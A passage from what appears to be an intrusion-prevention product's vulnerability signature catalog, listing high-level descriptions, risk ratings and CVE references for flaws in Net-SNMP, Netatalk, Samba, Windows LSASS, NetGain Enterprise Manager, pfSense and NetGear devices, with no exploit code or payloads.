Type: Insecure Configuration
Description: A vulnerability in Net-SNMP which allows remote attackers to execute arbitrary code through the SNMP write access configuration ability of SNMP-EXTEND-MIB.
Situation: SNMP-UDP_Net-SNMP-Write-Access-SNMP-EXTEND-MIB-Arbitrary-Code-Execution
Back to top

NetAlertX-Unauthenticated-Arbitrary-File-Read

About this vulnerability: A vulnerability in NetAlertX
Risk: High
First detected in: sgpkg-ips-1837-5242
Last changed: sgpkg-ips-1837-5242
Platform: Linux
Software: NetAlertX
Type: Directory Traversal
Description: A vulnerability in NetAlertX, versions prior to v24.10.12, which allows remote attackers to read sensitive files on a target system via a directory traversal, due to the lack of user input validation.
Situation: HTTP_CS-NetAlertX-Unauthenticated-Arbitrary-File-Read
References:
CVE-2024-48766
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-48766
Back to top

Netatalk-Dsi_opensession-Attention-Quantum-Out-Of-Bounds-Write

About this vulnerability: A vulnerability in Netatalk Netatalk
Risk: Moderate
First detected in: sgpkg-ips-1125-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Netatalk
Type: Malfunction
Description: A missing bounds check in the handling of the DSI Opensession command in Netatalk causes an out of bound write vulnerability. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: Generic_CS-Netatalk-Dsi_Ppensession-Attention-Quantum-Out-Of-Bounds-Write
References:
CVE-2018-1160
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1160
Back to top

Netatalk-Dsi_writeinit-Heap-Buffer-Overflow-Vulnerability

About this vulnerability: A vulnerability in Netatalk
Risk: High
First detected in: sgpkg-ips-1562-5242
Last changed: sgpkg-ips-1562-5242
Platform: Generic
Software: Netatalk
Type: Buffer Overflow
Description: A buffer overflow vulnerability has been reported in Netatalk. The vulnerability is due to improper validation of the length of user-supplied data. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target application. Successful exploitation could lead to execution of arbitrary code under the security context of the root user.
Situation: Generic_CS-Netatalk-Dsi_writeinit-Heap-Buffer-Overflow-Vulnerability
References:
CVE-2022-43634
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43634
Back to top

NetBIOS-CS-Samba-Long-Password-BO

About this vulnerability: NetBIOS Long Password Buffer Overflow
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Samba
Type: Buffer Overflow
Description: Samba contains a buffer overflow vulnerability in the handling of the password field, allowing an attacker to gain elevated system privileges through a long password.
Situation: SMB-TCP_CHS-Samba-Long-Password-BO
References:
CVE-1999-0182
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0182
BID-1816
http://www.securityfocus.com/bid/1816
Back to top

NetBIOS-LSASS-BOF

About this vulnerability: Buffer overflow vulnerability in LSASS (MS04-011)
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows NT 4.0; Windows 2000 SP2; Windows 2000 SP3; Windows 2000 SP4; Windows 2003; Windows 98; Windows ME
Software: LSASS
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in the Local Security Authority Subsystem Service (LSASS) in Microsoft Windows. A remote attacker can use this vulnerability to execute arbitrary code on the target system.
Situation: MSRPC-TCP_CPS-LSASS-BOF
References:
CVE-2003-0533
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0533
BID-10108
http://www.securityfocus.com/bid/10108
MS04-011
http://technet.microsoft.com/security/bulletin/MS04-011
Back to top

NetBIOS-NT4-RFPoison-DoS

About this vulnerability: RFPoison denial of service against NT4
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows NT 4.0
Software: RPC
Type: Malfunction
Description: Microsoft Windows NT 4.0 has a vulnerability in the handling of certain MSRPC calls in services.exe. An attacker can exploit this vulnerability to cause denial of service.
Situation: NetBIOS-TCP_RFPoison
References:
CVE-1999-0980
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0980
BID-754
http://www.securityfocus.com/bid/754
MS99-055
http://technet.microsoft.com/security/bulletin/MS99-055
Back to top

NetBIOS-Remote-Registry-Request-DoS-MS00-040

About this vulnerability: Microsoft Windows Remote Registry Request Denial of Service (MS00-040)
Risk: Low
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows NT 4.0
Software: <os>
Type: Malfunction
Description: Windows NT 4.0 is vulnerable to a denial of service attack if it is configured to allow remote registry requests. An authenticated user on the network could send a malformed remote registry request to the system to cause the winlogin.exe to crash. The system would have to be restarted to resume normal functionality.
Situation: MSRPC-TCP_CPS-Remote-Registry-Request-DoS
References:
CVE-2000-0377
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0377
BID-1331
http://www.securityfocus.com/bid/1331
MS00-040
http://technet.microsoft.com/security/bulletin/MS00-040
Back to top

NetBiter-webSCADA-Multiple-Vulnerabilities

About this vulnerability: A vulnerability in Netbiter webSCADA
Risk: High
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: NetBiter webSCADA
Type: Malfunction
Description: There are multiple information disclosure vulnerabilities in Netbiter webSCADA.
Situation: HTTP_CSU-NetBiter-webSCADA-User-Information-Disclosure
HTTP_CSU-NetBiter-webSCADA-Local-File-Disclosure
Back to top

Netcat-Stack-Buffer-Overflow

About this vulnerability: A Netcat Stack Buffer Overflow vulnerability
Risk: High
First detected in: sgpkg-ips-797-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Netcat
Type: Buffer Overflow
Description: A buffer overflow vulnerability in Netcat, version 1.10 NT, which allows remote attackers to execute arbitrary code via an overly long string.
Situation: Generic_CS-Netcat-Stack-Buffer-Overflow
References:
CVE-2004-1317
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1317
BID-12106
http://www.securityfocus.com/bid/12106
OSVDB-12612
http://www.osvdb.org/12612
Back to top

NetCode-Book-Cgi-System-Compromise

About this vulnerability: NetCode book.cgi Input Validation System Compromise
Risk: Moderate
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1602-5242
Platform: Generic
Software: NetCode NC Book
Type: Input Validation
Description: NetCode NC Book 0.2b book.cgi guest book contains an input validation flaw that allows an attacker to execute arbitrary commands leading to a system compromise.
References:
CVE-2001-1114
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1114
BID-3178
http://www.securityfocus.com/bid/3178
Back to top

NetData-Streaming-Alert-Command-Injection

About this vulnerability: A vulnerability in Netdata netdata
Risk: Moderate
First detected in: sgpkg-ips-1559-5242
Last changed: sgpkg-ips-1559-5242
Platform: Generic
Software: NetData
Type: Input Validation
Description: A command injection vulnerability has been reported in Netdata. The vulnerability is due to improper input validation when processing stream requests. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in command injection.
Situation: HTTP_CS-NetData-Streaming-Alert-Command-Injection
References:
CVE-2023-22496
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22496
Back to top

NetDecision-TFTP-Directory-Traversal-Execution

About this vulnerability: A NetDecision TFTP Directory Traversal Execution vulnerability.
Risk: High
First detected in: sgpkg-ips-725-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: NetMechanica NetDecision
Type: Directory Traversal
Description: A vulnerability in NetDecision TFTP version 4.2 which allows remote attackers to perform a directory traversal on a read or write command.
Situation: TFTP_NetDecision-TFTP-Directory-Traversal-Execution
References:
CVE-2009-1730
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1730
BID-35002
http://www.securityfocus.com/bid/35002
OSVDB-54607
http://www.osvdb.org/54607
Back to top

Netgain-Systems-Enterprise-Manager-Exec_Jsp-Command-Execution

About this vulnerability: A vulnerability in NetGain Systems Enterprise Manager
Risk: Moderate
First detected in: sgpkg-ips-1035-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: NetGain Systems Enterprise Manager
Type: Input Validation
Description: There has been reported a vulnerability in NetGain Systems Enterprise Manager. This vulnerability is due to improper validation of HTTP parameter. A remote attacker could send crafted requests to a vulnerable server, which could result in arbitrary command execution.
Situation: HTTP_CRL-Netgain-Systems-Enterprise-Manager-Exec_Jsp-Command-Execution
References:
CVE-2017-16602
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16602
Back to top

Netgain-Systems-Enterprise-Manager-Misc.sample_Jsp-Type-Directory-Traversal

About this vulnerability: A vulnerability in NetGain Systems Enterprise Manager
Risk: Moderate
First detected in: sgpkg-ips-1029-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: NetGain Systems Enterprise Manager
Type: Input Validation
Description: Improper validation of request paths causes a directory traversal vulnerability in NetGain Systems Enterprise Manager. A successful exploit allows an attacker to cause a denial of service condition resulting from the deletion of arbitrary files on the target system.
Situation: HTTP_CSU-Netgain-Systems-Enterprise-Manager-Misc.sample_Jsp-Type-Directory-Traversal
References:
CVE-2017-16599
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16599
Back to top

Netgain-Systems-Enterprise-Manager-Rmi-Registry-Insecure-Deserialization

About this vulnerability: A vulnerability in NetGain Systems Enterprise Manager
Risk: Moderate
First detected in: sgpkg-ips-1068-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: NetGain Systems Enterprise Manager
Type: Input Validation
Description: There has been reported a deserialization vulnerability in the NetGain Systems Enterprise Manager. Exploiting the vulnerability could lead to arbitrary code execution.
Situation: Generic_CS-Netgain-Systems-Enterprise-Manager-Rmi-Registry-Insecure-Deserialization
References:
CVE-2017-17406
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17406
Back to top

Netgain-Systems-Enterprise-Manager-Settings.upload-Filename-Directory-Traversal

About this vulnerability: A vulnerability in NetGain Systems Enterprise Manager
Risk: Moderate
First detected in: sgpkg-ips-1068-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: NetGain Systems Enterprise Manager
Type: Input Validation
Description: There has been reported a directory traversal vulnerability in NetGain Systems Enterprise Manager. This vulnerability can be exploited by a remote attacker. Successful exploitation could lead to arbitrary code execution.
Situation: HTTP_CSH-Netgain-Systems-Enterprise-Manager-Settings.upload-Filename-Directory-Traversal
References:
CVE-2017-16603
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16603
Back to top

Netgain-Systems-Enterprise-Manager-Snmpwalk-IP-Directory-Traversal

About this vulnerability: A vulnerability in NetGain Systems Enterprise Manager
Risk: Moderate
First detected in: sgpkg-ips-1059-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: NetGain Systems Enterprise Manager
Type: Input Validation
Description: A directory traversal vulnerability exists in NetGain Systems Enterprise Manager. The vulnerability is due to an input validation while processing ip parameter in org.apache.jsp.u.jsp.tools.snmpwalk.snmpwalk_005fdo_jsp servlet. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted request. Successful exploitation could allow an attacker to execute arbitrary code under the context of Administrator.
Situation: HTTP_CSU-Netgain-Systems-Enterprise-Manager-Snmpwalk-IP-Directory-Traversal
References:
CVE-2017-16598
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16598
Back to top

Netgain-Systems-Enterprise-Manager-Tftpserver-Filename-Directory-Traversal

About this vulnerability: A vulnerability in NetGain Systems Enterprise Manager
Risk: Moderate
First detected in: sgpkg-ips-1062-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: NetGain Systems Enterprise Manager
Type: Input Validation
Description: Improper input validation when processing TFTP WRQ packets causes a directory traversal vulnerability in NetGain Enterprise Manager. A successful exploit may allow an attacker to execute arbitrary code on the target system.
Situation: TFTP_CS-Netgain-Systems-Enterprise-Manager-Tftpserver-Filename-Directory-Traversal
References:
CVE-2017-16597
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16597
Back to top

Netgate-Pfsense-Acme-Acme_accountkeys_Edit.php-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Netgate pfSense
Risk: Moderate
First detected in: sgpkg-ips-1172-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PfSense
Type: Input Validation
Description: There has been reported a stored cross-site scripting vulnerability in Netgate pfSense. This vulnerability could be exploited by an authenticated remote attacker. Successful exploitation could lead in arbitrary script code execution in the target user's browser.
Situation: HTTP_CRL-Netgate-Pfsense-Acme-Acme_accountkeys_Edit.php-Stored-Cross-Site-Scripting
References:
CVE-2019-12347
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12347
Back to top

Netgate-Pfsense-Command-Injection-CVE-2023-42326

About this vulnerability: An attempt to exploit a vulnerability in PfSense detected
Risk: High
First detected in: sgpkg-ips-1665-5242
Last changed: sgpkg-ips-1665-5242
Platform: Generic
Software: PfSense
Type: Input Validation
Description: An issue in Netgate pfSense v.2.7.0 allows a remote attacker to execute arbitrary code via a crafted request to the "interfaces_gif_edit.php" and "interfaces_gre_edit.php" components.
Situation: HTTP_CRL-Netgate-Pfsense-Command-Injection-CVE-2023-42326
References:
CVE-2023-42326
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-42326
Back to top

Netgate-Pfsense-Cross-Site-Scripting-CVE-2023-42325

About this vulnerability: A vulnerability in Netgate pfSense
Risk: High
First detected in: sgpkg-ips-1665-5242
Last changed: sgpkg-ips-1665-5242
Platform: Generic
Software: PfSense
Type: Cross-site Scripting
Description: A reflected cross-site scripting vulnerability has been reported in Netgate pfSense. A remote attacker can exploit this vulnerability by tricking a pfSense user into clicking a maliciously crafted link. If the victim has pfSense administrator privileges, this vulnerability can lead to remote code execution.
Situation: HTTP_CRL-Netgate-Pfsense-Cross-Site-Scripting-CVE-2023-42325
References:
CVE-2023-42325
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-42325
Back to top

Netgate-Pfsense-Diag_packet_capture.php-Command-Injection

About this vulnerability: A vulnerability in Netgate pfSense
Risk: High
First detected in: sgpkg-ips-1668-5242
Last changed: sgpkg-ips-1668-5242
Platform: Generic
Software: PfSense
Type: Input Validation
Description: A command injection vulnerability has been reported in Netgate pfSense. The vulnerability is due to improper validation of values used by the diag_packet_capture.php file used in command lines. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in the execution of arbitrary command under the security context of the root user.
Situation: HTTP_CRL-Netgate-Pfsense-Diag_packet_capture.php-Command-Injection
References:
CVE-2023-48123
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-48123
Back to top

Netgate-Pfsense-Diag_Routes-Command-Injection

About this vulnerability: A vulnerability in Netgate pfSense CE
Risk: Moderate
First detected in: sgpkg-ips-1443-5242
Last changed: sgpkg-ips-1443-5242
Platform: Generic
Software: PfSense
Type: Input Validation
Description: Improper validation of parameters sent to the route diagnostic web page diag_routes.php causes a command injection vulnerability in PfSense. A successful exploit allows an attacker to execute arbitrary commands on the target system.
Situation: HTTP_CRL-Netgate-Pfsense-Diag_Routes-Command-Injection
References:
CVE-2021-41282
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41282
Back to top

Netgate-Pfsense-Firewall_alias.php-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Netgate pfSense CE
Risk: Moderate
First detected in: sgpkg-ips-1570-5242
Last changed: sgpkg-ips-1570-5242
Platform: Generic
Software: Netgate pfSense
Type: Input Validation
Description: A stored cross-site scripting vulnerability has been reported for Netgate pfSense. This vulnerability is due to improper input validation on the URLs and URL aliases in firewall_alias.php. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary code execution in the context of the victim's browser.
Situation: HTTP_CRL-Netgate-Pfsense-Firewall_alias.php-Stored-Cross-Site-Scripting
References:
CVE-2022-29273
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29273
Back to top

Netgate-Pfsense-Haproxy_listeners_Edit.php-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Netgate pfSense
Risk: Moderate
First detected in: sgpkg-ips-1173-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PfSense
Type: Input Validation
Description: There has been reported a stored cross-site scripting vulnerability in Netgate pfSense. Successful exploitation could lead in arbitrary script execution in the target user's browser.
Situation: HTTP_CRL-Netgate-Pfsense-Haproxy_listeners_Edit.php-Stored-Cross-Site-Scripting
References:
CVE-2019-8953
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8953
Back to top

Netgate-Pfsense-Pfblockerng-Host-Command-Injection

About this vulnerability: A vulnerability in Netgate pfSense pfBlockerNG
Risk: High
First detected in: sgpkg-ips-1506-5242
Last changed: sgpkg-ips-1506-5242
Platform: Generic
Software: PfSense
Type: Input Validation
Description: A command injection vulnerability exists in Netgate pfSense. The vulnerability is due to improper validation of Host HTTP header sent to plugin pfBlockerNG. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted HTTP request to the target server. Successfully exploiting this vulnerability could result in OS command injection in the context of root.
Situation: HTTP_CSH-Netgate-Pfsense-Pfblockerng-Host-Command-Injection
References:
CVE-2022-31814
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31814
Back to top

Netgate-Pfsense-Restore_rrddata-Command-Injection

About this vulnerability: A vulnerability in Netgate pfSense
Risk: High
First detected in: sgpkg-ips-1579-5242
Last changed: sgpkg-ips-1678-5242
Platform: Generic
Software: Netgate pfSense
Type: Input Validation
Description: A command execution vulnerability has been reported for Netgate pfSense. This vulnerability is due to improper input validation for the restore_rrddata function. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in OS command injection under the context of root.
Situation: HTTP_CS-Netgate-Pfsense-Restore_rrddata-Command-Injection
File-TextId_Netgate-Pfsense-Restore_rrddata-Command-Injection
References:
CVE-2023-27253
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27253
Back to top

Netgate-Pfsense-Services_wol_Edit.php-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Netgate pfSense
Risk: Moderate
First detected in: sgpkg-ips-1346-5242
Last changed: sgpkg-ips-1346-5242
Platform: Generic
Software: PfSense
Type: Input Validation
Description: There exists a stored cross-site scripting vulnerability in Netgate pfSense. Successful exploitation could lead in arbitrary script code execution in the target user's browser.
Situation: HTTP_CRL-Netgate-Pfsense-Services_wol_Edit.php-Stored-Cross-Site-Scripting
References:
CVE-2021-27933
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27933
Back to top

Netgate-Pfsense-Status-Command-Injection

About this vulnerability: A vulnerability in PfSense
Risk: Moderate
First detected in: sgpkg-ips-1520-5242
Last changed: sgpkg-ips-1520-5242
Platform: Generic
Software: PfSense
Type: Input Validation
Description: Improper sanitization of the name parameter in requests sent to firewall_aliases_edit.php causes a command injection vulnerability in NetGate pfSense. A successful exploit allows an attacker to execute arbitrary commands on the target system with root privileges.
Situation: HTTP_CRL-Netgate-Pfsense-Status-Command-Injection
Back to top

Netgate-Pfsense-Stored-Cross-Site-Scripting-CVE-2024-46538

About this vulnerability: A vulnerability in Netgate pfSense
Risk: High
First detected in: sgpkg-ips-1818-5242
Last changed: sgpkg-ips-1818-5242
Platform: Generic
Software: PfSense
Type: Input Validation
Description: A stored cross-site scripting vulnerability has been reported for Netgate pfSense. This vulnerability is due to improper input validation on the members parameter in interfaces_groups_edit.php. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary code execution in the context of the victim's browser.
Situation: HTTP_CRL-Netgate-Pfsense-Stored-Cross-Site-Scripting-CVE-2024-46538
References:
CVE-2024-46538
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-46538
Back to top

Netgate-Pfsense-System_Advanced_misc.php-Command-Injection

About this vulnerability: A vulnerability in Netgate pfSense
Risk: Moderate
First detected in: sgpkg-ips-1123-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PfSense
Type: Input Validation
Description: There has been reported a command injection vulnerability in the administrative interface of Netgate pfSense. This vulnerability can be exploited by an authenticated remote attacker. Successful exploitation leads in arbitrary code execution.
Situation: HTTP_CRL-Netgate-Pfsense-System_Advanced_misc.php-Command-Injection
References:
CVE-2018-4021
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4021
Back to top

NetGear-Administrator-Password-Disclosure

About this vulnerability: A vulnerability in NetGear
Risk: High
First detected in: sgpkg-ips-1127-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: NetGear
Type: Malfunction
Description: A vulnerability in NetGear that allows remote attackers to collect the admin user password by passing the token generated from unauth.cgi to passwordrecovered.cgi.
Situation: HTTP_CSU-NetGear-Administrator-Password-Disclosure
References:
CVE-2017-5521
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5521
Back to top

NetGear-DGN1000-Remote-Command-Execution

About this vulnerability: A vulnerability in Netgear DGN1000
Risk: High
First detected in: sgpkg-ips-1202-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: NetGear
Type: Malfunction
Description: There exists a remote code execution vulnerability in the firmware of NetGear DGN1000 device. Successful exploitation could lead in arbitrary code execution.
Situation: HTTP_CRL-NetGear-DGN1000-Remote-Command-Execution
Back to top

NetGear-DGN2200-dnslookup.cgi-Command-Injection

About this vulnerability: A NetGear DGN2200 dnslookup.cgi Command Injection vulnerability
Risk: High
First detected in: sgpkg-ips-1025-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: NetGear
Type: Input Validation
Description: A vulnerability in Netgear DGN2200 routers, versions 1-4, which allows remote attackers to execute arbitrary commands by sending a specially crafted POST request.
Situation: HTTP_CS-NetGear-DGN2200-dnslookup.cgi-Command-Injection
References:
CVE-2017-6334
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6334
Back to top

NetGear-DGN2200-Remote-Command-Execution-CVE-2017-6077

About this vulnerability: A vulnerability in Netgear DGN2200
Risk: High
First detected in: sgpkg-ips-1443-5242
Last changed: sgpkg-ips-1443-5242
Platform: Generic
Software: NetGear
Type: Input Validation
Description: There exists a remote command execution vulnerability in the firmware of NetGear DGN2200 device. Successful exploitation can allow an authenticated attacker to execute arbitrary OS commands.
Situation: HTTP_CRL-NetGear-DGN2200-Remote-Command-Execution-CVE-2017-6077
References:
CVE-2017-6077
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6077
Back to top

NetGear-NMS300-Configfilecontroller-Addconfigfile-Arbitrary-File-Deletion

About this vulnerability: A vulnerability in Netgear ProSAFE NMS300
Risk: Moderate
First detected in: sgpkg-ips-1348-5242
Last changed: sgpkg-ips-1348-5242
Platform: Generic
Software: NetGear NMS300
Type: Directory Traversal
Description: Improper validation of the parameters in the addConfigFile method of the ConfigFileController class causes a path traversal vulnerability which allows an attacker to delete arbitrary files on the target system.
Situation: HTTP_CRL-NetGear-NMS300-Configfilecontroller-Addconfigfile-Arbitrary-File-Deletion
References:
CVE-2021-27275
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27275
Back to top

NetGear-NMS300-Configimagecontroller-Addconfigfile-Arbitrary-File-Deletion

About this vulnerability: A vulnerability in NetGear ProSAFE NMS300
Risk: Moderate
First detected in: sgpkg-ips-1350-5242
Last changed: sgpkg-ips-1350-5242
Platform: Generic
Software: NetGear NMS300
Type: Directory Traversal
Description: Improper validation of the parameters in the addConfigFile method of the ConfigImageController class causes a vulnerability in NetGear NMS300. A successful exploit allows an attacker to delete arbitrary files on the target system and to cause a denial of service condition.
Situation: HTTP_CRL-NetGear-NMS300-Configimagecontroller-Addconfigfile-Arbitrary-File-Deletion
Back to top

NetGear-NMS300-Fileuploadutils-Directory-Traversal

About this vulnerability: A vulnerability in Netgear ProSAFE NMS300
Risk: Moderate
First detected in: sgpkg-ips-1353-5242
Last changed: sgpkg-ips-1353-5242
Platform: Generic
Software: NetGear NMS300
Type: Directory Traversal
Description: Insufficient validation of paths in HTTP POST requests in the file upload functions causes a path traversal vulnerability in Netgear NMS300. A successful exploit allows an attacker to upload and possibly execute arbitrary files on the target system.
Situation: HTTP_CS-NetGear-NMS300-Fileuploadutils-Directory-Traversal
Back to top

NetGear-NMS300-Management-System-Arbitrary-File-Read-CVE-2016-1525

About this vulnerability: A vulnerability in NetGear NMS300
Risk: High
First detected in: sgpkg-ips-1866-5242
Last changed: sgpkg-ips-1866-5242
Platform: Generic
Software: NetGear NMS300
Type: Directory Traversal
Description: A path traversal vulnerability in NetGear NMS300, versions 1.5.0.11 and before, which allows authenticated remote attackers to read arbitrary files.
Situation: HTTP_CRL-NetGear-NMS300-Configimagecontroller-Addconfigfile-Arbitrary-File-Deletion
References:
CVE-2016-1525
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1525
Back to top

NetGear-NMS300-Mfileuploadcontroller-Unrestricted-File-Upload

About this vulnerability: A vulnerability in Netgear ProSAFE NMS300
Risk: Moderate
First detected in: sgpkg-ips-1352-5242
Last changed: sgpkg-ips-1352-5242
Platform: Generic
Software: NetGear NMS300
Type: Input Validation
Description: Improper validation of request contents causes an unrestricted file upload vulnerability in Netgear NMS300. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: HTTP_CS-NetGear-NMS300-Mfileuploadcontroller-Unrestricted-File-Upload
References:
CVE-2021-27274
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27274
Back to top

NetGear-Orbi-Router-Rbr750-Command-Execution-CVE-2022-37337

About this vulnerability: A vulnerability in NetGear Orbi Router RBR750
Risk: High
First detected in: sgpkg-ips-1570-5242
Last changed: sgpkg-ips-1570-5242
Platform: Generic
Software: NetGear Orbi
Type: Input Validation
Description: A command execution vulnerability has been reported in NetGear Orbi Router model RBR750. A remote attacker with valid user credentials may leverage this vulnerability to execute arbitrary code via a crafted HTTP request. If the Orbi mesh network is unprotected, authentication is not required for exploitation.
Situation: HTTP_CRL-NetGear-Orbi-Router-Rbr750-Command-Execution-CVE-2022-37337
References:
CVE-2022-37337
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37337
Back to top

NetGear-Orbi-Satellite-RBS750-Command-Execution-CVE-2022-36429

About this vulnerability: A vulnerability in NetGear Orbi Satellite
Risk: High
First detected in: sgpkg-ips-1595-5242
Last changed: sgpkg-ips-1595-5242
Platform: Generic
Software: NetGear Orbi
Type: Malfunction
Description: A command execution vulnerability has been reported in NetGear Orbi Satellite, model RBS750 4.6.8.5. A remote attacker with valid user credentials may leverage this vulnerability to enable a hidden telnet service via a crafted JSON object.
Situation: File-Text_NetGear-Orbi-Satellite-RBS750-Command-Execution-CVE-2022-36429
References:
CVE-2022-36429
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36429
Back to top

NetGear-ProSafe-NMS300-Clearalertbyids-SQL-Injection

About this vulnerability: A vulnerability in Netgear ProSAFE NMS300
Risk: Moderate
First detected in: sgpkg-ips-1662-5242
Last changed: sgpkg-ips-1662-5242
Platform: Generic
Software: NetGear NMS300
Type: Input Validation
Description: An SQL injection vulnerability has been reported in Netgear ProSAFE NMS300. This vulnerability is due to improper input validation in the clearAlertByIds function. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in SQL injection.
Situation: HTTP_CRL-NetGear-ProSafe-NMS300-Clearalertbyids-SQL-Injection
References:
CVE-2023-44449
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-44449
Back to top

NetGear-ProSafe-NMS300-CVE-2023-38095-Arbitrary-File-Upload

About this vulnerability: A vulnerability in Netgear ProSAFE NMS300
Risk: High
First detected in: sgpkg-ips-1644-5242
Last changed: sgpkg-ips-1644-5242
Platform: Generic
Software: NetGear NMS300
Type: Directory Traversal
Description: An unrestricted file upload vulnerability exists in Netgear ProSAFE NMS300. The vulnerability is due to improper validation of the uploaded file in the MFileUploadController class. A remote attacker could exploit the vulnerability by sending crafted HTTP requests to the target server. Successful exploitation would result in the code execution under the security context of SYSTEM.
Situation: HTTP_CRL-NetGear-ProSafe-NMS300-CVE-2023-38095-Arbitrary-File-Upload
References:
CVE-2023-38095
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38095
Back to top

NetGear-ProSafe-NMS300-CVE-2024-5247-Uploadservlet-Unrestricted-File-Upload

About this vulnerability: A vulnerability in Netgear ProSAFE NMS300
Risk: High
First detected in: sgpkg-ips-1737-5242
Last changed: sgpkg-ips-1737-5242
Platform: Generic
Software: NetGear NMS300
Type: Input Validation
Description: An unrestricted file upload vulnerability has been reported for Netgear ProSAFE NMS300. This vulnerability is due to improper input validation in the UpLoadServlet class. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary file creation or, in the worst case, remote code execution in the context of SYSTEM.
Situation: HTTP_CRL-NetGear-ProSafe-NMS300-Uploadservlet-Unrestricted-File-Upload
References:
CVE-2024-5247
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5247
Back to top

NetGear-ProSafe-NMS300-Getnodesbytopologymapsearch-SQL-Injection

About this vulnerability: A vulnerability in Netgear ProSAFE NMS300
Risk: Moderate
First detected in: sgpkg-ips-1618-5242
Last changed: sgpkg-ips-1663-5242
Platform: Generic
Software: NetGear NMS300
Type: Input Validation
